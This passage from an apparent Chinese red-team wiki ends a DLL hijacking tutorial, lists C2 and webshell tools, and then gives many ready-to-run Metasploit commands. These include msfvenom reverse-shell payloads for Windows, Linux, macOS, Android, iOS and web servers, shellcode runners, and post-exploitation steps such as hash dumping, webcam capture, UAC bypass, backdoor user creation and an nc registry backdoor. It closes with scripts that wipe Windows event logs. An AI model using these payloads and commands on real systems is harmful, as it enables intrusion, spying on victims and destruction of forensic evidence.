#pragma comment(linker, "/export:exportedFunction1=legit1.exportedFunction1")
#pragma comment(linker, "/export:exportedFunction2=legit1.exportedFunction2")
#pragma comment(linker, "/export:exportedFunction3=legit1.exportedFunction3")

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{

    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        MessageBoxA(NULL, "Hi from malicious dll", "Hi from malicious dll", 0);
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

{% endtab %}
{% endtabs %}

The key piece in the `malicious.dll` is the `#pragma` comment at the top, that tells the linker to export / forward (technical name is `Forward Export`) functions `exportedFunction1`, `exportedFunction2`, `exportedFunction3` to the module `legit1.dll`.

Also, note that once the `malicious.dll` is loaded, it will display a prompt saying `Hi from malicious dll`, but this could be any payload of our choice:

Let's test if the `malicious.dll` executes our payload - shows a message prompt:

```
rundll32 malicious.dll,whatever
```

### DLL Proxying / Hijacking

We now have all the required pieces to test the dll proxying concept.

Let's move the `malicious.dll` to `c:\temp`, where `legit.dll` resides:

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUcLmB_ZgW8toaipc3g%2F-MUcOIbUN82FeEL4AdZW%2Fimage%20\(730\).png?alt=media\&token=19f15e1c-5522-4f67-8d13-a275a4c2e2a9)

Rename the `legit.dll` to `legit1.dll` and `alicious.dll` to `legit.dll`:

```
mv .\legit.dll .\legit1.dll; mv .\malicious.dll .\legit.dll
```

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUcLmB_ZgW8toaipc3g%2F-MUcOl5pSMrtVrB4-tDN%2Frename-files.gif?alt=media\&token=4981f2ad-63e6-4458-90ee-c52b95514f5d)

### Moment of Truth

Now, let's invoke the `exportedFunction1` from `legit.dll` - this is our malicious DLL with DLL proxying enabled.

If the hijacking is successful, we will see the prompt `Hi from malicious dll` followed by the prompt `Hi from legit exportedFunction1` from the `legit1.dll`:

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUcLmB_ZgW8toaipc3g%2F-MUcOw-25T5B2PGRokpI%2Frename-files.gif?alt=media\&token=16529ff6-d9b0-49b1-8887-31cfe6a79e66)

Implementing DLL proxying for a DLL that exports many functions may be a bit painful, but luckily there are multiple projects that help you automate this process, one of which is <https://github.com/Flangvik/SharpDllProxy>, so go check it out.

## References

<https://dl.packetstormsecurity.net/papers/win/intercept_apis_dll_redirection.pdf>


# 工具篇


# 代理工具

{% embed url="<https://github.com/antique-goo/tunneltools>" %}


# 国内

{% embed url="<https://github.com/AntSwordProject/antSword>" %}

{% embed url="<https://github.com/rebeyond/Behinder>" %}

{% embed url="<https://github.com/BeichenDream/Godzilla>" %}


# 国外


# Cobalt Strike

{% embed url="<https://github.com/aleenzz/Cobalt_Strike_wiki>" %}


# dnscat2

{% embed url="<https://github.com/iagox86/dnscat2>" %}


# Merlin

{% embed url="<https://github.com/Ne0nd0g/merlin>" %}


# Metasploit

来源自https\://www\.cnblogs.com/LyShark/p/12189163.html

{% embed url="<https://github.com/rapid7/metasploit-framework>" %}

{% embed url="<https://github.com/rapid7/metasploit-payloads>" %}

Metasploit 是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，同时该工具也是渗透测试环境中的利器，它支持多平台Payload的生成具有完全的跨平台性，本次实验将学会生成各种攻击载荷。

**快速安装Metasploit** linux系统下只需要执行下面的三条命令既可以自动安装,不过国内网速你懂的.

```
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \
> msfinstall && chmod 755 msfinstall && ./msfinstall
```

## **关于Msfvenom命令常用参数解释**

```
[root@localhost ~]# msfvenom --help

      -p, --payload    <payload>       指定需要使用的payload(攻击荷载)
      -l, --list       [module_type]   列出指定模块的所有可用资源.
      -n, --nopsled    <length>        为payload预先指定一个NOP滑动长度
      -f, --format     <format>        指定输出格式
      -e, --encoder    [encoder]       指定需要使用的encoder编码器
      -a, --arch       <architecture>  指定payload的目标架构
          --platform   <platform>      指定payload的目标平台
      -s, --space      <length>        设定有效攻击荷载的最大长度
      -b, --bad-chars  <list>          设定规避字符集
      -i, --iterations <count>         指定payload的编码次数
          --shellest                   最小化生成payload
```

**Windows ShellCode**

```
[root@localhost ~]# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp \
-b '\x00\x0b' lhost=192.168.1.20 lport=9999 -f c

[root@localhost ~]# msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp \
-b '\x00\x0b' lhost=192.168.1.20 lport=9999 -f c
```

**Windows EXE Or DLL**

```
[root@localhost ~]# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp \
lhost=192.168.1.20 lport=9999 -e x86/shikata_ga_nai -i 3 -b '\x00\x0a\xff' -f exe -o payload.exe

[root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp -b'\x0\x0b' \
lhost=192.168.1.20 lport=9999 -f dll > payload.dll
```

**Linux ShellCode**

```
[root@localhost ~]# msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp \
lhost=192.168.1.20 lport=9999 -f c

[root@localhost ~]# msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp \
lhost=192.168.1.20 lport=9999 -f c
```

**Linux ELF Or ELF-SO**

```
[root@localhost ~]# msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp -b'\x00\x0b' \
lhost=192.168.1.20 lport=9999 -f elf -o payload.elf

[root@localhost ~]# msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp -b'\x00\x0b' \
lhost=192.168.1.20 lport=9999 -f elf -o payload.elf

[root@localhost ~]# msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp -b'\x00\x0b' \
lhost=192.168.1.20 lport=9999 -f elf-so -o payload.so
```

**Mac OS X ShellCode**

```
[root@localhost ~]# msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp \
-b '\x0\x0b' lhhost=192.168.1.20 lport=9999 -f c

[root@localhost ~]# msfvenom -a x64 --platform osx -p osx/x64/shell_reverse_tcp \
-b '\x0\x0b' lhhost=192.168.1.20 lport=9999 -f c
```

**Mac OS X Macho**

```
[root@localhost ~]# msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp -b '\x00\0b' \
lhost=192.168.1.20 lport=9999 -f macho -o payload.macho

[root@localhost ~]# msfvenom -a x64 --platform osx -p osx/x64/shell_reverse_tcp -b '\x00\0b' \
lhost=192.168.1.20 lport=9999 -f macho -o payload.macho
```

**Android Or Iphone App**

```
[root@localhost ~]# msfvenom --platform android -p android/meterpreter/reverse_tcp \
lhost=192.168.1.20 lport=9999 -o payload.apk

[root@localhost ~]# msfvenom --platform apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp \
lhost=192.168.1.20 lport=9999 -o payload.ios
```

**PHP Or ASP Or JSP**

```
[root@localhost ~]# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.20 lport=9999 -f raw > shell.php

[root@localhost ~]# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp \
lhost=192.168.1.20 lport=9999 -f aspx -o payload.aspx

[root@localhost ~]# msfvenom --platform java -p java/jsp_shell_reverse_tcp \
lhost=192.168.1.20 lport=9999 -f raw -o payload.jsp

[root@localhost ~]# msfvenom -p java/jsp_shell_reverse_tcp \
lhost=192.168.1.20 lport=9999 -f raw -o payload.war
```

**BASH Or PowerShell**

```
[root@localhost ~]# msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.20 LPORT=9999 > -f raw > payload.sh
[root@localhost ~]# exec 5<>/dev/tcp/192.168.1.20/9999

[root@localhost ~]# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp \
-b '\x00\x0b' LHOST=192.168.1.20 lport=9999 -f psh-cmd > payload.ps1
```

**Python Or Ruby Or NodeJS**

```
[root@localhost ~]# msfvenom -p python/meterpreter/reverse_tcp \
lhost=192.168.1.20 lport=9999 -f raw -o payload.py

[root@localhost ~]# msfvenom -p ruby/shell_reverse_tcp \
LHOST=192.168.1.20 LPORT=9999 -f raw -o payload.rb

[root@localhost ~]# msfvenom -p cmd/unix/reverse_lua \
LHOST=192.168.1.20 LPORT=9999 -f raw -o payload.lua

[root@localhost ~]# msfvenom -p nodejs/shell_reverse_tcp \
LHOST=192.168.1.20 LPORT=9999 -f raw -o payload.js

[root@localhost ~]# msfvenom -p cmd/unix/reverse_perl \
LHOST=192.168.1.20 LPORT=9999 -f raw -o payload.pl
```

**服务端配置后门回弹会话(通用)**

```
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.20
msf5 exploit(multi/handler) > set lport 9999
msf5 exploit(multi/handler) > exploit -j -z
```

**Windows: 附上ShellCode有效性测试框架**

```
#include <Windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")

unsigned char buf[] = "";

typedef void(__stdcall *CODE) ();
int main()
{
    //((void(*)(void))&buf)();
    PVOID pFunction = NULL;
    pFunction = VirtualAlloc(0, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(pFunction, buf, sizeof(buf));
    CODE StartShell = (CODE)pFunction;
    StartShell();
}
```

**Linux: 附上ShellCode有效性测试框架**

```
#include <stdlib.h>
const unsigned char shellcode[] = "\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9";

int main(int argc, char **argv) {
    int (*ret)();
    ret = (int(*)())shellcode;
    (int)(*ret)();
    exit(0);
}

#include <stdio.h>
#include <string.h>
 
char *shellcode = "\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9";
 
int main(void)
{
    fprintf(stdout,"Length: %d\n",strlen(shellcode));
    (*(void(*)()) shellcode)();
    return 0;
}
```

**后渗透基础命令**

```
msf5 exploit(multi/handler) > sessions          # 查询当前会话
msf5 exploit(multi/handler) > sessions -i 1     # 通过ID号进入指定会话
msf5 exploit(multi/handler) > sessions -k 1     # 通过ID号杀死一个会话
msf5 exploit(multi/handler) > background        # 将会话放入后台
msf5 exploit(multi/handler) > getuid/getpid     # 查询用户权限与PID
msf5 exploit(multi/handler) > sysinfo           # 查看目标系统信息
msf5 exploit(multi/handler) > ps                # 查目标主机进程
msf5 exploit(multi/handler) > kill PID          # 杀死目标制定进程
msf5 exploit(multi/handler) > getsystem         # 尝试令牌提权
msf5 exploit(multi/handler) > shell             # 进入目标shell环境

msf5 exploit(multi/handler) > enumdesktops   # 查看可用的桌面
msf5 exploit(multi/handler) > getdesktop     # 获取当前meterpreter关联的桌面
msf5 exploit(multi/handler) > set_desktop    # 设置meterpreter关联的桌面
msf5 exploit(multi/handler) > screenshot     # 截屏
msf5 exploit(multi/handler) > run vnc        # 使用vnc远程桌面连接

msf5 exploit(multi/handler) > uictl disable mouse    # 禁用目标鼠标
msf5 exploit(multi/handler) > uictl enable keyboard  # 开启目标键盘

msf5 exploit(multi/handler) > webcam_list       # 查看目标主机摄像头
msf5 exploit(multi/handler) > webcam_snap       # 摄像头拍裸照
msf5 exploit(multi/handler) > webcam_stream     # 开启目标主机摄像头
msf5 exploit(multi/handler) > clearav           # 销毁日志文件

msf5 exploit(multi/handler) > webcam_stream -i 1/2       #打开前置或后置摄像头
msf5 exploit(multi/handler) > check_root                 #检测root
msf5 exploit(multi/handler) > dump_calllog               #下载电话记录
msf5 exploit(multi/handler) > dump_contacts              #下载信息记录
msf5 exploit(multi/handler) > geolocate                  #定位，需要下载谷歌地图
```

**Migrate进程迁移**

```
msf5 exploit(multi/handler) > execute                  # 在目标机器中执行文件
msf5 exploit(multi/handler) > execute -H -i -f cmd.exe # 创建新进程cmd.exe -H不可见-i交互

msf5 exploit(multi/handler) > getpid
msf5 exploit(multi/handler) > ps
msf5 exploit(multi/handler) > migrate PID   # 通过PID号迁移进程
```

**文件查阅与远程传输**

```
msf5 exploit(multi/handler) > getwd                                # 查看当前工作目录
msf5 exploit(multi/handler) > search -f *filename*                 # 搜索文件
msf5 exploit(multi/handler) > cat c:\\lyshark.log                  # 查看文件内容
msf5 exploit(multi/handler) > upload /tmp/shell.exe C:\\shell.exe  # 上传文件到目标机
msf5 exploit(multi/handler) > download c:\\shell.exe /tmp/         # 下载文件到本机上
msf5 exploit(multi/handler) > edit c:\\lyshark.log                 # VIM编辑或创建文件
msf5 exploit(multi/handler) > rm C:\\lyshark.log                   # 删除文件
msf5 exploit(multi/handler) > getlwd                               # 看肉鸡当前目录
msf5 exploit(multi/handler) > lcd /tmp                             # 切换目录
```

**网络与端口转发/端口扫描**

```
msf5 exploit(multi/handler) > ifconfig        # 查询肉鸡IP地址
msf5 exploit(multi/handler) > netstat -antp   # 查询目标网络连接
msf5 exploit(multi/handler) > arp -a          # 查询目标ARP缓存
msf5 exploit(multi/handler) > getproxy        # 查看目标代理信息
msf5 exploit(multi/handler) > route           # 查看目标路由表
run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24          # 扫描192.168.1.0/24网段
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.1.100 PORTS=3389 # 检测是否开启3389端口

#-----------------------------------------------------------------------
# portfwd 端口转发与端口关闭
portfwd add -l 9999 -p 3389 -r 127.0.0.1   # 将目标机3389端口转发到本地9999
portfwd list                               # 查询当前转发列表
portfwd delete -l 9999                     # 删除本地主机的9999端口映射

#-----------------------------------------------------------------------
# autoroute 添加与删除主机路由
run autoroute -p                              # 查询添加的路由记录
run autoroute -s 10.10.10.1 -n 255.255.255.0  # 在目标主机添加一条路由
run autoroute -d -s 10.10.10.1                # 删除目标主机中的路由
run autoroute -s 10.10.10.1/24                # 添加一个路由网段
```

**后渗透信息搜集模块**

```
#-----------------------------------------------------------------------
# Centos系统中这些模块默认保存在以下目录中
[root@localhost post]# cd /opt/metasploit-framework/embedded/framework/modules/post/
[root@localhost post]# ls
aix  android  apple_ios  brocade  cisco  firefox  hardware  juniper  linux  multi  osx  solaris  windows

# 以Windows系统中的搜集模块为例,其默认存储在以下路径下.
[root@localhost gather]# pwd
/opt/metasploit-framework/embedded/framework/modules/post/windows/gather

#-----------------------------------------------------------------------
# 信息搜集模块众多,这里拿几个常用模块备注

meterpreter > info post/windows/gather/enum_files           # 查询模块配置参数
meterpreter > run post/windows/gather/enum_files            # 枚举目标服务
meterpreter > run post/windows/gather/enum_services         # 枚举目标服务
meterpreter > run post/windows/gather/hashdump              # 盗取Hash
meterpreter > run post/windows/gather/checkvm               # 是否虚拟机
meterpreter > run post/windows/gather/forensics/enum_drives # 查看分区
meterpreter > run post/windows/gather/enum_applications     # 获取安装软件信息
meterpreter > run post/windows/gather/dumplinks             # 获取最近的文件操作
meterpreter > run post/windows/gather/enum_ie               # 获取IE缓存
meterpreter > run post/windows/gather/enum_chrome           # 获取Chrome缓存
meterpreter > run post/windows/gather/enum_patches          # 补丁信息
meterpreter > run post/windows/gather/enum_domain           # 查找域控
```

**针对肉鸡的提权操作**

```
#-----------------------------------------------------------------------
# 使用bypassuac脚本尝试提权
meterpreter > background
msf > use exploit/windows/local/bypassuac
msf > set SESSION 1
msf > run

#-----------------------------------------------------------------------
meterpreter > run post/windows/gather/enum_patches      # 收集目标主机补丁情况
[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7
meterpreter > background
msf > use exploit/windows/local/ms13_053_schlamperei    # 寻找相符合的提权脚本,执行测试
msf > set SESSION 1
msf > exploit
```

**添加系统用户与开启3389远程**

```
#-----------------------------------------------------------------------
# 添加系统用户与开启远程桌面
meterpreter > run getgui -e                                                     # 开启远程桌面
meterpreter > run getgui -u lyshark -p 123123                                   # 添加用户
meterpreter > run getgui -f 9999 -e                                             # 3389端口转发到9999
meterpreter > run post/windows/manage/enable_rdp                                # 开启远程桌面
meterpreter > run post/windows/manage/enable_rdp USERNAME=lyshark PASSWORD=123  # 添加用户
meterpreter > run post/windows/manage/enable_rdp FORWARD=true LPORT=9999        # 将3389端口转发到9999
```

**注册表操作与写入后门**

```
-d   注册表中值的数据.    -k   注册表键路径    -v   注册表键名称
enumkey 枚举可获得的键    setval 设置键值    queryval 查询键值数据
#-----------------------------------------------------------------------
upload /root/nc.exe C:\\windows\\                                       # 上传nc工具到根目录
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run  # 枚举run下的key
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v myshell -d 'C:\windows\nc.exe -Ldp 666 -e cmd.exe' # 加后门
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v myshell    # 查看键值

[root@localhost ~]# nc -v 192.168.1.20 666   # 攻击者连接后门
```

**目标网卡抓包**

```
msf > use sniffer
msf > sniffer_interfaces     # 查看网卡
msf > sniffer_start 1        # 选择网卡开始抓包
msf > sniffer_stats 1        # 查看状态
msf > sniffer_dump 1 /tmp/ltest.pcap  #导出pcap数据包
msf > sniffer_stop 1         # 停止抓包
```


# ngrok内网穿透

{% embed url="<https://github.com/inconshreveable/ngrok>" %}


# Nishang

{% embed url="<https://github.com/samratashok/nishang>" %}


# p0wnedShell

{% embed url="<https://github.com/Cn33liz/p0wnedShell>" %}


# PoshC2

{% embed url="<https://github.com/nettitude/PoshC2>" %}


# PowerShell Empire

{% embed url="<https://github.com/EmpireProject/Empire>" %}


# Pupy Shell

{% embed url="<https://github.com/n1nj4sec/pupy>" %}


# 日志清理

## Windows日志清理

* 3389日志清理
* Dos命令日志清理
* Web日志清理

## Linux日志清理

* Shell命令日志清理
* /var/log日志清理
* Web日志清理

## 脚本

{% tabs %}
{% tab title="日志清理.bat" %}

```
@echo off 
Title  日志清理工具
echo 所有用户帐号ID为：
echo.
for /f "skip=4 tokens=1-3" %%i in ('net user') do (
	if not "%%i"=="命令成功完成。" echo %%i
	if not "%%j"=="" echo %%j
	if not "%%k"=="" echo %%k
)
echo.
echo 当前用户帐号ID为：%username%
@ net stop "task scheduler"
@del /f /s /q %systemroot%\system32\config\*.evt
@del /f /s /q %systemroot%\system32\logfiles\*.*
@del /f /s /q %systemroot%\system32\dtclog\*.*
@del /f /s /q %systemroot%\system32\*.log
@del /f /s /q %systemroot%\system32\*.txt
@del /f /s /q %systemroot%\schedlgu.txt 
@del /f /s /q %systemdrive%\*.gid
@del /f /s /q %systemroot%\system32\config\SecEvent.evt 
@del /f /s /q %systemroot%\system32\*.ip
@del /f /s /q c:\winnt\*.txt
@del /f /s /q c:\winnt\*.log
@del /f /q %userprofile%\cookies\*.*
@reg delete “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default” 
@del “%USERPROFILE%\My Documents\Default.rdp”
@exit
```

{% endtab %}

{% tab title="日志清理.sh" %}

```

#!/bin/sh
###########################
#delete log blog.duplicatedcode.com
# in_day_num: like 1 2 is delete 2day ago logs
# in_log_path like tomcat log home
###########################
in_log_path=${1}
in_day_num=${2}
tmp_delete_log=/var/log/deletelog/"`date +%Y%m`.log"
deleteLog()
{
inner_num=${1}
#find log
echo "[`date`] >> start delete logs---" >> $tmp_delete_log
find ${in_log_path} -type f -mtime ${inner_num} -print0 | xargs -0 rm -rf
echo "[`date`] >> end delete logs---" >> $tmp_delete_log
}
init()
{
mkdir -p /var/log/deletelog/
}
main()
{
init
if [ -z ${in_log_path} ];then
echo "[`date`] >> error log_path not init---" >> $tmp_delete_log
return
fi
inner_day_num=+7
if [[ -n ${in_day_num} ]] && [[ ${in_day_num} -ge 1 ]] ; then
${inner_day_num}=${in_day_num}
fi
deleteLog ${inner_day_num}
}
main

```

{% endtab %}
{% endtabs %}


# 报告模板


# 关于我们

黑锋安全小组(www\.iredteam.cn)成立于2018年11月，经过两年的发展，已经形成完整的ATT\&CK红队安全体系，目前团队上线第一个开源项目(wiki.iredteam.cn)。

## 团队成员

{% hint style="info" %}
@antique

擅长技能：Web安全、代码审计、红队攻击
{% endhint %}

{% hint style="info" %}
@longe

擅长技能：病毒分析、企业安全攻防、ATT\&CK体系建设
{% endhint %}

{% hint style="info" %}
@k

擅长技能：Web安全
{% endhint %}

{% hint style="info" %}
@YD

擅长技能：PHP开发、PYTHON开发、漏洞挖掘
{% endhint %}

## 加入我们

{% hint style="success" %}
目前团队初步组建，现团队缺二进制方向成员

如有需要请联系微信：shoujilile111
{% endhint %}

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMpB7CoxxMxomaXzmQ%2F-MUMpp7gcCBGohRgbR-2%2Fb6aa4189166c9a0b2f3f43eac6eab90.jpg?alt=media\&token=8898ead2-2442-4326-8d16-5783aadab4f6)


# 友情链接

## 友情链接

* [ired.team](https://www.ired.team/)
* [lyshark blog](https://www.cnblogs.com/lyshark)
* [子域名查询---超级好用没有之一](https://ruo.me/sub/)
* [PeiQI WiKi-POC文库](http://wiki.peiqi.tech/)

## 申请条件

你想要我就给被，我这人好说话


